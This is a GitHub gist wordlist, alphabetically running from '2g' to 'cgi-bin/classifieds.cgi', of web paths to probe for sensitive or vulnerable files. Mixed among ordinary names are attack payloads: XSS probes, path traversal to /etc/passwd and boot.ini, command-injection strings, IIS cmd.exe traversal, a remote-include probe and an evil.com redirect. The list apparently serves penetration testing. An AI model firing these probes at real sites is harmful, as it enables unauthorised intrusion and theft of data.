Skip to content

Instantly share code, notes, and snippets.

@tamimibrahim17

tamimibrahim17/shortlist.txt

Created December 2, 2019 05:54
Show Gist options
  • Save tamimibrahim17/f0321ea1a4f48eace741cf94beb9ca95 to your computer and use it in GitHub Desktop.
Save tamimibrahim17/f0321ea1a4f48eace741cf94beb9ca95 to your computer and use it in GitHub Desktop.
Download ZIP
Short list of commonly sensitive or vulnerable web paths
Raw
shortlist.txt
2g
2.php
2.tar
2.tar.bz2
2.tar.gz
2.txt
2.zip
3
30
300
32
3g
3.php
3rdparty
4
400
401
403
404
42
4.php
5
50
500
51
5.php
6
64
6.php
7
7.php
.7z
7z
8
852566C90012664F
8.php
9
96
9.php
a
a/
A
aa
aaa
ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar
ab2/\@AdminViewError
ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>
abc
abc123
abcd
abcd1234
abonnement.asp
about
About
about-us
about_us
aboutus
AboutUs
abstract
abton/spaw2/dialogs/dialog.php
abuse
ac
academic
academics
acart2_0/acart2_0.mdb
acart2_0/admin/category.asp
acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
acart2_0/error.asp?msg=<script>alert(\"test\")</script>
acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
acartpath/signin.asp?|-|0|404_Object_Not_Found
acatalog
acc
acceptance_config.yml
acceso/
.access
access
access/
access.1
access_db
accessgranted
accessibility
access-log
access.log
access_log
accesslog
access-log.1
access_log.1
accesslogs
accessories
access.phtml
acciones/
accommodation
account
account/
accountants
account_edit
account_history
accounting
accounting/
account.nsf
account.php
accounts
accountsettings
accounts/getuserdesc.asp
accounts.nsf
account.sql
accounts.sql
accounts.txt
acct_login
achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
achitecture
acp
act
action
actions
activate
active
activeCollab
active.log
activex
activex/
activities
activity
ad
adaptive
adclick
add
add_acl
add_cart
addfav
addnews
addons
add.php
add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
addpost
addreply
address
.addressbook
address_book
addressbook
addressbook/index.php?name=<script>alert('Vulnerable')</script>
addressbook/index.php?surname=<script>alert('Vulnerable')</script>
addressbook.php?\"><script>alert(Vulnerable)</script><!--
addresses
addtocart
adduser
add_user.php
addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
ad_js
adlog
adlogger
.adm
_adm
~adm
adm
adm/
ADM
admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]
admcgi/contents.htm
admcgi/scripts/Fpadmcgi.exe
admentor/adminadmin.asp
.admin
_admin
~admin
admin
admin/
admin_
Admin
Admin/
ADMIN
admin0
admin1
admin1/
admin1.php
admin2
admin2/
admin%20/
admin2.asp
admin2.old/
admin2.php
admin3
admin4_account
admin4_colon
admin4.nsf
admin5.nsf
admin/access.log
admin/access_log
admin/access.txt
admin-admin
admin/adminer.php
admin/admin.php?adminpy=1
admin/admin_phpinfo.php4
admin/adminproc.asp
admin/admin.shtml
admin/aindex.htm
admin_area
admin/auth.php
admin/backup/
admin/backups/
admin_banner
admin/bootstrap.inc.php?mgp=danc3Uf@t&c=whoami
admin/browse.asp?FilePath=c:\&Opt=2&level=0
admin_c
admin/cfg/configscreen.inc.php+
admin/cfg/configsite.inc.php+
admin/cfg/configsql.inc.php+
admin/cfg/configtache.inc.php+
admin.cgi
admin/cms/htmltags.php
admin/.config
ADMINconfig.php
admin-console
admin-console/
adminconsole
admin/contextAdmin/contextAdmin.html
admincontrol
admincontrol.php
admincp
admincp/
admincp/js/kindeditor/
admin/cplogfile.log
admincp/upload/
admin/credit_card_info.php
admin.dat
admin/database/wwForum.mdb
admin/datasource.asp
admin/db/
admin/db.php
admin/db.php?dump_sql=1
admin/download.php
admin/_dump/
admin/dumper/
admin/editor/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2lite&type=imagesundefined
adminer/
adminer-4.0.3-mysql.php
adminer-4.0.3.php
adminer-4.1.0-mysql.php
adminer-4.1.0.php
adminer-4.2.0-mysql.php
adminer-4.2.0.php
adminer/adminer.php
adminer.php
.adminer.php.swp
admin/error.log
admin/error_log
admin/error.txt
admin/exec.php3
admin/exec.php3?cmd=cat%20/etc/passwd
admin/exec.php3?cmd=dir%20c:\
admin/export.php
admin/FCKeditor
admin/fckeditor
admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
admin/fckeditor/editor/filemanager/connectors/php/connector.php
admin/fckeditor/editor/filemanager/connectors/php/upload.php
admin/fckeditor/editor/filemanager/upload/asp/upload.asp
admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
admin/fckeditor/editor/filemanager/upload/php/upload.php
admin_files
Admin_files/
Admin_files/order.log
adminhelp
admin/.htaccess
admin.htm
admin.html
admin/includes/configure.php~
admin/include/spaw2/dialogs/dialog.php
admin_index
admin/index.php
admin-interface
admin_interface
administer
administr8
administracao.php
administracion
administracion.php
administrador
administrat
administrateur.php
administratie
administration
administration/
Administration
Administration/
administration.php
administration/Sym.php
administrative/
administrative/login_history
~administrator
administrator
administrator/
administratoraccounts
administrator/components/com_joommyadmin/phpmyadmin/
administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/uploadimage.php
administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>
administrator/.htaccess
administrator/logs
administrator.php
administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
administrators
administrators.pwd
administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>
administrivia
admin/js/tiny_mce/
admin/js/tinymce/
admin/lib/spaw2/dialogs/dialog.php
admin/log
admin_login
adminlogin
admin/login.php?action=insert&username=test&password=test
admin/login.php?path=\"></form><form
admin_logon
adminlogon
admin/logs/
admin/logs/login.txt
admin.mdb
admin/modules/cache.php+
admin.nsf
admin/objects.inc.php4
adminpanel
adminpanel/
adminpanel.html
adminpanel.php
admin.php
admin.php3
admin.php4?reg_login=1
admin.php?en_log_id=0&action=config
admin.php?en_log_id=0&action=users
admin/phpinfo.php
admin/phpmyadmin/
admin/phpMyAdmin/
Admin/phpmyadmin/
Admin/phpMyAdmin/
admin/phpmyadmin/scripts/setup.php
admin.pl
admin/pma/
admin/pma/scripts/setup.php
admin/pol_log.txt
admin/private/logs
adminpro
admins
admins/
admins.asp
admins/backup/
admin/script.php
admin/scripts/setup.php
admin-serv/
admin-serv/config/admpw
AdminService
admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
adminsessions
admin/settings.inc.php+
admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
admin.shtml
admins/log.txt
admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2lite&type=imagesundefined
admin/spaw/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2lite&type=imagesundefined
admins.php
adminsql
admin/sxd/
admin/system_footer.php
admin/system.php3?cmd=cat%20/etc/passwd
admin/system.php3?cmd=dir%20c:\
admin/templates/header.php
admin/test/
admin_t/include/aff_liste_langue.php
admintools
AdminTools
admin/uploadarticles/uploadTester.asp
admin/upload.php
admin/user_count.txt
admin/wg_user-info.ml
admisapi/fpadmin.htm
admissions
admon
ADMON
admpar/.ftppass
adm.php
admrev/_files/
admrev/.ftppass
adm/spaw2/dialogs/dialog.php
adm/upload.php
adobe
adodb
a_domlog.nsf
adovbs.inc
ads
adsamples/config/site.csc
adserver
adsl
adsystem
adv
advanced
advanced_search
advancedsearch
adv_counter
advert
advertise
advertisement
advertisers
advertising
adverts
adv/gm001-mc/
advice
adview
advisories
advwebadmin/
advworks/equipment/catalog_type.asp
af
aff
affiche
affich.php?image=<script>alert(document.cookie)</script>
affiliate
affiliate_info
affiliates
affiliates.sql
affiliate_terms
affiliatewiz
aff_news.php
africa
agb
agency
agenda
agent
Agent/
agentadmin.php
agentes/
Agentes/
agentrunner.nsf
agents
Agents/
aggregator
AggreSpy
_ajax
ajax
ajax/app/yahoo/yahoo.htm
ajax_cron
a.jsp/<script>alert('Vulnerable')</script>
akamai
akeeba.backend.log
akopia/
aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
alarm
alarms
album
albums
albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
alcatel
alert
alerts
alfa/
alias
aliases
all
all.sql
alltime
all-wcprops
alog.nsf
alpha
alt
alumni
alumni_add
alumni_details
alumni_info
alumni_reunions
alumni_update
am
amad.php
~amanda
amanda
amazon
amember
ammerum/
amministratore.php
analog
analog/
analog.html
analyse
analysis
analytics
and
android
announce
announcement
announcements
annuaire
annual
anon
anon_ftp
anonymous
ans/ans.pl?p=../../../../../usr/bin/id|&blah
ansi
ans.pl?p=../../../../../usr/bin/id|&blah
answer
answers
answers/error_log
anthill/login.php
antibot_image
antispam
antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0
antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally)
antivirus
anuncios
any
aol
ap
apac
~apache
apache
apache/
apache-default/phpmyadmin/
apache/logs/access.log
apache/logs/access_log
apache/logs/error.log
apache/logs/error_log
apanel
apc
apc/apc.php
apc/index.php
apc-nrp.php
apc.php
.apdisk
apex/
apexec
api
api/
apibuild.pyc
api/error_log
apis
apl
aplogon.html
apm
app
app/
app/bin
app_browser
app_browsers
appcache.manifest
app_code
app/composer.json
app/composer.lock
app.config
app/config/adminConf.json
app/config/databases.yml
app/config/database.yml
app/config/database.yml~
app/config/database.yml_original
app/config/database.yml.pgsql
app/config/database.yml.sqlite3
app/config/global.json
app/config/parameters.ini
app/config/parameters.yml
app/config/routes.cfg
app/config/schema.yml
app_data
appdet.html
app/dev
app_dev.php
app/docs
appeal
appeals
append
app/etc/config.xml
app/etc/enterprise.xml
app/etc/fpc.xml
app/etc/local.additional
app/etc/local.xml
app/etc/local.xml.additional
app/etc/local.xml.bak
app/etc/local.xml.live
app/etc/local.xml.localRemote
app/etc/local.xml.phpunit
app/etc/local.xml.template
app/etc/local.xml.vmachine
app/etc/local.xml.vmachine.rm
app/.htaccess
app.js
app.json
appl
app/languages
apple
.AppleDB
.AppleDesktop
.AppleDouble
applet
applets
appliance
appliation
application
application/cache/
application.log
application/logs/
applications
application.wadl
applicattion/
applicattions/
applist.asp
app/log/
app/logs/
apply
app/phpunit.xml
approval/ts_app.htm
apps
apps/
apps/frontend/config/app.yml
apps/frontend/config/databases.yml
AppsLocalLogin
AppsLogin
appspec.yml
app/src
apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script>
apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
app/sys
app/testing
app_themes
app/unschedule.bat
app/vendor
app/vendor-src
apr
ar
arbeit
arcade
arch
architect
architecture
archiv
archivar/
_archive
archive
archive/
Archive
archive/a_domlog.nsf
archive.asp
archive_forum.asp
archive/l_domlog.nsf
archives
archives/
archivo/
archivos
ariadne/
arquivos
array
arrow
ars
art
article
article.cfm?id=1'<script>alert(document.cookie);</script>
article.php?article=4965&post=1111111111
article.php?sid=\"><Img
articles
Articles
artikel
artists
arts
artwork
as
ascii
asdf
a_security.htm
ashley
ashnews.php
asia
ask
askapache
ask_a_question
asmx
asp
asp/
Asp/
aspadmin
asp.aspx
ASP/cart/database/metacart.mdb
aspdnsfcommon
aspdnsfencrypt
aspdnsfgateways
aspdnsfpatterns
aspnet_client
aspnet_webadmin
asps
asp/sqlqhit.asp
asp/SQLQHit.asp
aspwpadmin
aspx
aspxspy.aspx
asset
assetmanage
assetmanagement
_assets
assets
assets/fckeditor
assets/js/fckeditor
assets/npm-debug.log
asterisk.log
at
AT-admin.cgi
atc/
athenareg.php?pass=%20;cat%20/etc/passwd
atlassian-ide-plugin.xml
atom
atomicboard/index.php?location=../../../../../../../../../../etc/passwd
attach
attachment
attachments
attach_mod
attachs
attic
au
auction
auctions
audio
audit
audits
auth
auth/
authentication
auth.inc
auth.inc.php
author
author.asp
authoring
authorization
authorization.config
authorized_keys
authors
auth.php
authuser
auth_user_file.txt
authusers
auto
autobackup
autobackup.php
autocheck
autodeploy
autodiscover
autohtml.php?op=modload&mainfile=x&name=/etc/passwd
autologin
autologon.html?10514
automatic
automation
automotive
aux
av
avatar
avatars
aw
award
awardingbodies
awards
awebvisit.stat
awl
awmdata
awstats
awstats/
awstats.conf
awstats.pl
axis
axis2
axis2-admin
axis-admin
axis-cgi/buffer/command.cgi
axs
ayuda/
az
azureadmin/
b
B
b1
b2b
b2badmin/
b2c
b2-include/b2edit.showposts.php
b2-tools/gm-2-b2.php
ba4.nsf
back
backdoor
backdoor/
backdoor.php
backend
background
backgrounds
backoffice
BackOffice
back.sql
_backup
back-up
backup
backup/
.Backup
Backup/
backup0/
backup1/
backup123/
backup2
backup2/
backup2010.sql
backup2011.sql
backup2012.sql
backup2013.sql
backup2014.sql
backup2015.sql
backup2016.sql
backup.7z
backup-db
backup.htpasswd
backup.inc
backup.inc.old
backup_migrate
backup.old
backup.rar
backups
backups/
Backups/
backups.7z
backups.inc
backups.inc.old
backups.old
backup.sql
backup.sql.7z
backup.sql.bz2
backup.sql.gz
backup.sql.old
backup.sql.rar
backup.sql.sql
backup.sql.tar
backup.sql.tar.bz2
backup.sql.tar.bzip2
backup.sql.tar.gz
backup.sql.tar.gzip
backup.sql.tgz
backup.sql.zip
backups.rar
backups.sql
backups.sql.old
backups.tar
backups.tar.bz2
backups.tar.gz
backups.tgz
backups.zip
backup.tar
backup.tar.bz2
backup.tar.gz
backup.tgz
backup.zip
BACLIENT
bad_link
.bak
bak
bak/
_baks
bak-up
bakup
balance
balances
ban
ban.bak
banca/
banco/
ban.dat
bandwidth
bandwidth/index.cgi
bank
bank/
banking
banks
ban.log
banmat.pwd
banned
banner
banner2
banneradmin
bannerads
banner_element
banners
banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*
bar
base
base/
Base
baseball
base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
bash
.bash_history
.bash_logout
.bash_profile
.bashrc
basic
basilix/
basilix/compose-attach.php3
basilix/mbox-list.php3
basilix/message-read.php3
basilix.php3
basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
basket
basketball
baskets
bass
bat
batch
baz
bb
bb000001.pl<script>alert('Vulnerable')</script>
bb-admin/
bbadmin
bbclone
bb-dnbd/faxsurvey
bb-hist
bb-histlog
bboard
bbs
bbv/
bc
bc4j.html
bd
bdata
bdata/
bdatos/
bd.sql
be
bea
bean
beans
beehive
beheer
benefits
benutzer
best
beta
beta/
bfc
bg
big
bigadmin
bigconf.cgi
bigdump.php
bigip
bigsam_guestbook.php?displayBegin=9999...9999
bilder
bill
billing
billing/billing.apw
billing/killer.php
billing.nsf
~bin
bin
bin/
bin/admin.pl
binaries
binary
bin/cfgwiz.exe
bin/CGImail.exe
bin/common/user_update_passwd.pl
bin/config.sh
bin/contents.htm
bin/fpadmin.htm
bin/fpremadm.exe
bin/fpsrvadm.exe
BingSiteAuth.xml
bin/reset-db-prod.sh
bin/reset-db.sh
bins
bio
bios
bitrix
bitrix/admin/index.php
bitrix/admin/info.php
bitrix/admin/i.php
bitrix/admin/phpinfo.php
bitrix/admin/php.php
bitrix/admin/p.php
bitrix/authorization.config
bitrix/backup/
bitrix/dumper/
bitrix/error.log
bitrix/import/
bitrix/import/files
bitrix/import/import
bitrix/import/m_import
bitrix/logs/
bitrix/modules/error.log
bitrix/modules/error.log.old
bitrix/modules/main/admin/restore.php
bitrix/modules/main/classes/mysql/agent.php
bitrix/modules/smtpd.log
bitrix/modules/updater.log
bitrix/modules/updater_partner.log
bitrix/otp/
bitrix/php_interface/dbconn.1
bitrix/php_interface/dbconn.2
bitrix/php_interface/dbconn.bak
bitrix/php_interface/dbconn.dist
bitrix/php_interface/dbconn.old
bitrix/php_interface/dbconn.php2
bitrix/php_interface/dbconn.php.bak
bitrix/php_interface/dbconn.php.dist
bitrix/php_interface/dbconn.php.old
bitrix/php_interface/dbconn.php.save
bitrix/php_interface/dbconn.php.swp
bitrix/php_interface/dbconn.php.templ
bitrix/php_interface/dbconn.php.txt
bitrix/php_interface/dbconn.save
bitrix/php_interface/dbconn.swp
bitrix/php_interface/dbconn.txt
bitrix/rk.php?goto=http://evil.com
bitrix/web.config
biy/upload/
biz
biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found
biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found
bk
bkup
bl
black
blacklist.dat
Black.php
blah
blah123.php
blah_badfile.shtml
blahb.ida
blahb.idq
blah-whatever-badfile.jsp
blah-whatever.jsp
blank
blb
block
blocked
blocks
blog
Blog
blog_ajax
blog/error_log
blogger
bloggers
blogindex
blog_inlinemod
blog/phpmyadmin/
blog_report
blogs
blog_search
blogspot
blog_usercp
blog/wp-content/backup-db/
blog/wp-content/backups/
blow
blue
bm
bmp/
bmp/global-web-application.xml
bmp/JSPClient.java
bmp/mime.types
bmp/README.txt
bmp/setconn.jsp
bmp/sqljdemo.jsp
bmz_cache
bnnr
bo
board
board/index.php
board/philboard_admin.asp+
boards
bob
body
bofh
boiler
boilerplate
boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found
boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
bonus
bonuses
book
booker
booking
bookmark
bookmark.nsf
bookmarks
books
Books
books.nsf
bookstore
boost_stats
boot
boot/
_borders
bot
bots
bottom
bottom.html
bot-trap
bot.txt
boutique
.bower-cachez
.bower-registry
.bower-tmp
box
boxes
br
brand
brands
broadband
brochure
brochures
broken
broken_link
broker
browse
browser
Browser
bs
bsd
bt
buck.sql
buddies.blt
buddy.blt
buddylist.blt
bug
bugs
bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>
bugtest+/+
.build/
build
BUILD
build/buildinfo.properties
build/build.properties
build_config_private.ini
builder
build.gradle
build.local.xml
.buildpath
.buildpath/
buildr
.builds
build.sh
build.xml
bulk
bulksms
bullet
.bundle
busca
buscador
buscar
business
Business
busytime.nsf
button
buttons
buy
buy/
buynow
buynow/
buyproduct
bypass
bytehoard/index.php?infolder=../../../../../../../../../../../etc/
.bz2
bz2
.bzr/README
c
c/
C
c100.php
c22.php
c32web.exe/ChangeAdminPassword
.c9/
c99.php
c99shell.php
.c9revisions/
ca
ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f
ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>
cabinet
.cache
.cache/
__cache/
_cache
cache
cache/
cachemgr
cachemgr.cgi
cache/sql_error_latest.cgi
cache-stats/
caching
cad
cadmins
ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
caja/
cal
calc
calendar
calendar_events
calendarevents
calendar.nsf
calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
calendars
calendar_sports
calender
call
callback
callee
caller
callin
calling
callout
cam
camel
campaign
campaigns
can
canada
Capfile
.capistrano
.capistrano/metrics
captcha
car
carbo.dll
carbuyaction
card
card/
cardinal
cardinalauth
cardinalform
cards
cards/
career
careers
carp
carpet
cars
cart
cart/
cartcart.cgi
carthandler
carts
cas
cases
casestudies
cash
cash/
cat
catalog
catalog/includes/include_once.php
catalog.nsf
_catalogs
catalogs
catalogsearch
catalogue
catalog.wci
catalyst
catch
categoria
categorie.php3?cid=june
categories
category
catinfo
catinfo?<u><b>TESTING
cats
caupo/admin/admin_workspace.php
ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
cb
cbms/cbmsfoot.php
cbms/changepass.php
cbms/editclient.php
cbms/passgen.php
cbms/realinv.php
cbms/usersetup.php
cc
ccard/
.cc-ban.txt
.cc-ban.txt.bak
ccbill
ccbill.log
ccbill/secure/ccbill.log
ccbill/whereami.cgi
cc-errors.txt
cc-log.txt
ccount
ccp14admin
ccs
cd
cd/
cd-cgi/sscd_suncourier.pl
cdrom
cdrom/
cehttp/property/
cehttp/trace
cell.xml
centres
cersvr.nsf
cert
cert/
certa.nsf
certenroll
certificado/
certificate
certificates
certification
certified
certlog.nsf
certs
certserver
certsrv
certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
certsrv.nsf
cf
cfajax/app/yahoo/yahoo.htm
cfappman/index.cfm
cfc
cfcache
cfcache.map
cfdocs
cfdocs/cfcache.map
cfdocs/cfmlsyntaxcheck.cfm
cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
cfdocs/exampleapp/email/application.cfm
cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
cfdocs/exampleapp/publish/admin/addcontent.cfm
cfdocs/exampleapp/publish/admin/application.cfm
cfdocs/examples/cvbeans/beaninfo.cfm
cfdocs/examples/httpclient/mainframeset.cfm
cfdocs/examples/parks/detail.cfm
cfdocs/expeval/displayopenedfile.cfm
cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
cfdocs/expeval/openfile.cfm
cfdocs/expeval/sendmail.cfm
cfdocs.map
cfdocs/snippets/evaluate.cfm
cfdocs/snippets/fileexists.cfm
cfdocs/snippets/gettempdirectory.cfm
cfdocs/snippets/viewexample.cfm
.cfg
cfg
cfide
cfide/administrator/index.cfm
CFIDE/administrator/index.cfm
cfide/Administrator/startstop.html
CFIDE/probe.cfm
cfm
cfusion
cgi
cgi-bin
cgi-bin/
cgi_bin
cgibin
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin2
cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
cgi-bin/%2e%2e/abyss.conf
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
cgi-bin/.access
cgi-bin/addbanner.cgi
cgi-bin/add_ftp.cgi
cgi-bin/adduser.cgi
cgi-bin/admin/admin.cgi
cgi-bin/admin.cgi
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
cgi-bin/adminhot.cgi
cgi-bin/admin.php
cgi-bin/admin.php3
cgi-bin/admin.pl
cgi-bin/admin/setup.cgi
cgi-bin/adminwww.cgi
cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/aglimpse
cgi-bin/aglimpse.cgi
cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/amadmin.pl
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/anyboard.cgi
cgi-bin/AnyBoard.cgi
cgi-bin/AnyForm
cgi-bin/AnyForm2
cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
cgi-bin/archie
cgi-bin/architext_query.cgi
cgi-bin/architext_query.pl
cgi-bin/ash
cgi-bin/astrocam.cgi
cgi-bin/AT-admin.cgi
cgi-bin/AT-generate.cgi
cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
cgi-bin/auctiondeluxe/auction.pl
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
cgi-bin/auth_data/auth_user_file.txt
cgi-bin/awl/auctionweaver.pl
cgi-bin/awstats/awstats.pl
cgi-bin/awstats.pl
cgi-bin/ax-admin.cgi
cgi-bin/ax.cgi
cgi-bin/axs.cgi
cgi-bin/Backup/add-passwd.cgi
cgi-bin/badmin.cgi
cgi-bin/banner.cgi
cgi-bin/bannereditor.cgi
cgi-bin/bash
cgi-bin/bb-ack.sh
cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-histlog.sh
cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
cgi-bin/bb-replog.sh
cgi-bin/bb-rep.sh
cgi-bin/bbs_forum.cgi
cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;
cgi-bin/bigconf.cgi
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
cgi-bin/bizdb1-search.cgi
cgi-bin/blog/
cgi-bin/blog/mt.cfg
cgi-bin/blog/mt-check.cgi
cgi-bin/blog/mt-load.cgi
cgi-bin/bnbform
cgi-bin/bnbform.cgi
cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
cgi-bin/boozt/admin/index.cgi?section=5&input=1
cgi-bin/bsguest.cgi?email=x;ls
cgi-bin/bslist.cgi?email=x;ls
cgi-bin/build.cgi
cgi-bin/bulk/bulk.cgi
cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/c32web.exe/ChangeAdminPassword
cgi-bin/cached_feed.cgi
cgi-bin/cachemgr.cgi
cgi-bin/calendar
cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/calendar/index.cgi
cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
cgi-bin/calendar.pl
cgi-bin/calender_admin.pl
cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
cgi-bin/campas?%0acat%0a/etc/passwd%0a
cgi-bin/cart32.exe
cgi-bin/cartmanager.cgi
cgi-bin/cart.pl
cgi-bin/cart.pl?db='
cgi-bin/cbmc/forums.cgi
cgi-bin/ccbill-local.cgi?cmd=MENU
cgi-bin/ccbill-local.pl?cmd=MENU
cgi-bin/c_download.cgi
cgi-bin/cfgwiz.exe
cgi-bin/cgforum.cgi
cgi-bin/cgicso?query=AAA
cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
cgi-bin/cgi-lib.pl
cgi-bin/cgimail.exe
cgi-bin/CGImail.exe
cgi-bin/cgi_process
cgi-bin/cgi-test.exe
cgi-bin/cgitest.exe
cgi-bin/Cgitest.exe
cgi-bin/cgiwrap
cgi-bin/cgiwrap/%3Cfont%20color=red%3E
cgi-bin/cgiwrap/~JUNK(5)
cgi-bin/cgiwrap/~root
cgi-bin/cgiwrap/~@USERS
cgi-bin/change-your-password.pl
cgi-bin/classified.cgi
cgi-bin/classifieds
cgi-bin/classifieds.cgi
